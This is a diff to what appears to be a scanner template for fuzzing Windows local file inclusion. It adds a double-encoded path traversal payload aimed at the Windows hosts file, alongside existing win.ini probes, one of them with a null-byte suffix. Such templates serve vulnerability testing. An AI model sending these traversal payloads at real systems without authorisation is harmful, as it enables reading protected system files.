--- a/lfi/windows-lfi-fuzz.yaml
+++ b/lfi/windows-lfi-fuzz.yaml
@@ -13,6 +13,7 @@ http:
 
     payloads:
       win_fuzz:
+        - '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts'
         - '\WINDOWS\win.ini'
         - '\WINDOWS\win.ini'
         - '\WINDOWS\win.ini%00'
